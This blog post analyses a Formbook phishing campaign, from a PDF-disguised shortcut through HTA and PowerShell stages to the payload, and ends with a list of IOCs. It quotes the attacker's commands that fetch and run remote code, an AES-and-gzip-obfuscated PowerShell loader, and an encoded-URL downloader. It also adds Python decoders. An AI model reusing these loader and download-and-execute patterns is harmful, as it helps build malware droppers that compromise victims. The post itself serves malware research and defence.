[QuickNote] Examining Formbook Campaign via Phishing Emails

Posted: July 6, 2023 in My Tutorials, [QuickNote] Examining Formbook Campaign via Phishing Emails

1. Initial foothold

The attacker sent an email with an attachment named “brochure-for-2023-elite-events.rar”. The RAR archive contains a single .lnk (shortcut) file named brochure-for-2023-elite-events.pdf.lnk. Once extracted, it is displayed with a PDF icon, so an inattentive user sees what looks like a PDF document:

Analysis of the .lnk file shows that it runs powershell.exe with a wildcard-obfuscated argument (\W*\*2\msh*e, which resolves to mshta.exe under \Windows\System32) to fetch and execute a remote HTA script:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany[.]com/ta/pintu'+'.hta')

2. Analyzing HTA script

Download the file pintu.hta for analysis. This file contains a VBScript code snippet as follows:

To facilitate the deobfuscation of the code snippet above, I have modified it as follows:

Running the modified pintu.hta yields VBScript containing a function that launches the next-stage PowerShell script.

3. Analyzing the 1st Powershell script

ZAA = "powershell[.]exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe
    $xbFz = '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';
    $HMTijTI = 'bllXeHFBWFhNYU9kcHFnRFNSbk1EQVVSUmJqQm5Wb0w=';
    $BfslXFB = New-Object 'System.Security.Cryptography.AesManaged';
    $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB;
    $BfslXFB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;
    $BfslXFB.BlockSize = 128;
    $BfslXFB.KeySize = 256;
    $BfslXFB.Key = [System.Convert]::FromBase64String($HMTijTI);
    $JmaZB = [System.Convert]::FromBase64String($xbFz);
    $myyVlryP = $JmaZB[0..15];
    $BfslXFB.IV = $myyVlryP;
    $xgdtNsuBK = $BfslXFB.CreateDecryptor();
    $KbcpSLgDq = $xgdtNsuBK.TransformFinalBlock($JmaZB, 16, $JmaZB.Length - 16);
    $BfslXFB.Dispose();
    $bDcpNBr = New-Object System.IO.MemoryStream( , $KbcpSLgDq );
    $OmEpFPG = New-Object System.IO.MemoryStream;
    $DswuaJEln = New-Object System.IO.Compression.GzipStream $bDcpNBr, ([IO.Compression.CompressionMode]::Decompress);
    $DswuaJEln.CopyTo( $OmEpFPG );
    $DswuaJEln.Close();
    $bDcpNBr.Close();
    [byte[]] $dhbwdLTm = $OmEpFPG.ToArray();
    $SRunF = [System.Text.Encoding]::UTF8.GetString($dhbwdLTm);
    $SRunF | powershell - }"

The script performs the following tasks:

  • Decodes the base64 string assigned to $xbFz and uses its first 16 bytes as the IV; the remaining bytes are the encrypted data.

  • Decodes the base64 string assigned to $HMTijTI and uses it as the AES key.

  • Decrypts the encrypted data with AES using that key and IV, with $BfslXFB.Mode = [System.Security.Cryptography.CipherMode]::ECB and zero padding.

  • The first two bytes of the decrypted data are 0x1F 0x8B, the gzip magic, so the data is gzip-compressed. Decompressing it yields the next PowerShell script:
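The four steps above, re-implemented in Python as an added example (this is not code from the post or from the campaign; it needs the third-party cryptography package, `pip install cryptography`). The key and the sample blob are constructed here so the decoder can be exercised offline: pack_stage builds a blob in the same layout the script expects, unpack_stage mirrors the script. Two details worth seeing in code: CipherMode.ECB never uses an IV, so the 16 leading bytes are dead weight (with_zeroed_iv shows that overwriting them changes nothing), and PaddingMode.Zeros is never stripped on decrypt, so the gzip decoder simply stops at the end of the member and ignores the trailing zero bytes.

```python
"""Python re-implementation of the stage-1 unpacking routine
(base64 -> [16 bytes 'IV' | AES-256-ECB ciphertext] -> gzip -> script).
Added example; key and sample payload are constructed, not taken from the campaign."""
import base64
import gzip
import os
import zlib

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

GZIP_MAGIC = b"\x1f\x8b"   # the 0x1F 0x8B seen at the start of the decrypted data
BLOCK = 16                 # AES block size; the script treats the first 16 blob bytes as IV


def unpack_stage(b64_blob: str, b64_key: str) -> str:
    """Mirror the PowerShell: split off the 'IV', AES-256-ECB decrypt the rest,
    check the gzip magic, inflate, and decode the script as UTF-8."""
    blob = base64.b64decode(b64_blob)
    key = base64.b64decode(b64_key)
    if len(key) != 32:
        raise ValueError("expected a 256-bit AES key")
    iv, ciphertext = blob[:BLOCK], blob[BLOCK:]
    # ECB is a stateless per-block mode: `iv` is parsed but never used.
    if not ciphertext or len(ciphertext) % BLOCK:
        raise ValueError("ciphertext is empty or not block aligned")
    decryptor = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    # Zero padding stays attached after decryption; a gzip-aware inflater stops
    # at the end of the member and leaves the padding in unused_data.
    if padded[:2] != GZIP_MAGIC:
        raise ValueError(f"decrypted data is not gzip (starts with {padded[:2].hex()})")
    inflater = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)
    script = inflater.decompress(padded) + inflater.flush()
    return script.decode("utf-8")


def pack_stage(script: str, key: bytes) -> str:
    """Build a blob in the same layout (gzip -> zero-pad -> AES-256-ECB ->
    prepend 16 random bytes -> base64) so the decoder can be tested offline."""
    data = gzip.compress(script.encode("utf-8"))
    data += b"\x00" * (-len(data) % BLOCK)          # PaddingMode.Zeros
    encryptor = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    ciphertext = encryptor.update(data) + encryptor.finalize()
    return base64.b64encode(os.urandom(BLOCK) + ciphertext).decode("ascii")


def with_zeroed_iv(b64_blob: str) -> str:
    """Overwrite the 16 leading bytes: decryption is unaffected because ECB ignores the IV."""
    blob = base64.b64decode(b64_blob)
    return base64.b64encode(bytes(BLOCK) + blob[BLOCK:]).decode("ascii")


# Constructed sample (not the campaign's data): a benign stand-in for stage 2 and a fixed key.
SAMPLE_KEY = bytes(range(32))
SAMPLE_KEY_B64 = base64.b64encode(SAMPLE_KEY).decode("ascii")
SAMPLE_SCRIPT = "Write-Host 'stage-2 stand-in'"
SAMPLE_BLOB = pack_stage(SAMPLE_SCRIPT, SAMPLE_KEY)

if __name__ == "__main__":
    print(unpack_stage(SAMPLE_BLOB, SAMPLE_KEY_B64))
    print(unpack_stage(with_zeroed_iv(SAMPLE_BLOB), SAMPLE_KEY_B64))
```

To run the decoder against a real blob, pass the two base64 strings from the script ($xbFz and $HMTijTI) to unpack_stage; the gzip-magic check is the same sanity test the analysis used to recognise the compressed layer, and it is also the quickest way to notice a wrong key.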

4. Analyzing the 2nd Powershell script

The important part of this script is as follows:

# Dlt: subtracts the constant 6399 from every integer in the array and appends
# the resulting character, so strings (here, URLs) are hidden as integer lists.
function Dlt($iZq)
{
    $IBY = 6399;
    $dtu = $Null;
    foreach($kKX in $iZq)
    {
        $dtu += [char]($kKX - $IBY)
    };
    return $dtu
};
# RPJ: places the decoy PDF and the payload in %AppData%, fetching each one only
# if it is not already present, then opens them. zPg, lWh and pmh are helper
# functions defined elsewhere in the script (not shown here).
function RPJ()
{
    $oUv = $env:AppData + '\';
    $DASUDIl = $env:AppData;
    $GXIrywM = $DASUDIl + '\blank.pdf ';
    If(Test-Path -Path $GXIrywM){Invoke-Item $GXIrywM;}
    Else{ $kjrkrCO = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6508,6496,6502,6445,6518,6498,6510,6510,6508,6499,6445,6510,6513,6502,6446,6516,6511,6507,6510,6496,6499,6514,6446,6449,6447,6448,6455,6446,6447,6452,6446,6497,6507,6496,6509,6506,6445,6511,6499,6501));lWh $GXIrywM $kjrkrCO;Invoke-Item $GXIrywM;};;;
    $DauGlabYW = $oUv + '883.exe ';
    if (Test-Path -Path $DauGlabYW){pmh $DauGlabYW;}
    Else{ $ZbmZaJRahvY = zPg (Dlt @(6503,6515,6515,6511,6514,6457,6446,6446,6515,6503,6496,6509,6503,6496,6509,6498,6510,6508,6511,6496,6509,6520,6445,6498,6510,6508,6446,6502,6513,6504,6511,6446,6455,6455,6450,6445,6500,6519,6500));lWh $DauGlabYW $ZbmZaJRahvY;pmh $DauGlabYW;};;
}
RPJ;

The script uses the Dlt function to decode the download addresses of the next-stage files. Rewriting this function in Python and running it over the two integer arrays gives the download addresses of the payload and the decoy PDF:

[+] Defanged URL(s):

hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf
hxxps://thanhancompany[.]com/grip/883.exe
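
The Python rewrite of Dlt, as an added example (the post does not include its own script). The two integer arrays are the ones from the second-stage script above; the defang helper and recover_offset are additions: the latter goes beyond this sample and brute-forces the subtraction constant for a variant that uses a different $IBY, by keeping only offsets that map every value into printable ASCII and produce a URL.

```python
"""Python re-implementation of the Dlt() decoder from the 2nd-stage script.
Added example; arrays are the two embedded in the script, offset is its $IBY."""
from urllib.parse import urlsplit

OFFSET = 6399  # $IBY in the script

# The two arrays passed to Dlt in function RPJ (decoy PDF first, then payload).
DECOY_PDF = [6503, 6515, 6515, 6511, 6514, 6457, 6446, 6446, 6508, 6496, 6502, 6445,
             6518, 6498, 6510, 6510, 6508, 6499, 6445, 6510, 6513, 6502, 6446, 6516,
             6511, 6507, 6510, 6496, 6499, 6514, 6446, 6449, 6447, 6448, 6455, 6446,
             6447, 6452, 6446, 6497, 6507, 6496, 6509, 6506, 6445, 6511, 6499, 6501]
PAYLOAD = [6503, 6515, 6515, 6511, 6514, 6457, 6446, 6446, 6515, 6503, 6496, 6509,
           6503, 6496, 6509, 6498, 6510, 6508, 6511, 6496, 6509, 6520, 6445, 6498,
           6510, 6508, 6446, 6502, 6513, 6504, 6511, 6446, 6455, 6455, 6450, 6445,
           6500, 6519, 6500]


def dlt(values, offset=OFFSET):
    """Exact port of Dlt: each integer minus the offset is one character."""
    return "".join(chr(v - offset) for v in values)


def defang(url):
    """hxxp scheme and [.] in the host, so decoded URLs are safe to paste into a report."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    return f"{scheme}://{host}{parts.path}"


def decode_urls(arrays, offset=OFFSET):
    """Decode and defang every array in one go."""
    return [defang(dlt(a, offset)) for a in arrays]


def recover_offset(values, marker="http"):
    """For a variant with an unknown constant: every offset that keeps all values
    in printable ASCII is tried, and those yielding a string starting with `marker`
    are returned (the constant is the same across one script, so one hit suffices)."""
    lo, hi = max(values) - 126, min(values) - 32
    return [o for o in range(lo, hi + 1) if dlt(values, o).startswith(marker)]


if __name__ == "__main__":
    print("[+] Defanged URL(s):")
    for url in decode_urls([DECOY_PDF, PAYLOAD]):
        print(url)
    print("[+] Recovered offset(s):", recover_offset(PAYLOAD))
```

The defang helper brackets every dot in the host, so its output differs cosmetically from the listing above, which brackets only the first one.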

5. Formbook payload

At the time of analysis, I was able to successfully download the payload; its SHA256 is: 00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4

When executed, the .NET payload unpacks the final stage, which is the FormBook malware itself (likely a new build).

Running the payload under FakeNet and monitoring its process captures the traffic it generates to the following hosts:

6. IOCs:

hxxp://thanhancompany[.]com/ta/pintu.hta                              HTA script
hxxps://mag[.]wcoomd.org/uploads/2018/05/blank.pdf                    Decoy PDF
hxxps://thanhancompany[.]com/grip/883.exe                             Payload URI
00f20471ea61f5b0f5a1e2e9be722369ea515aaea80283aa046bd47e51f952e4      Payload SHA256

End.

m4n0w4r
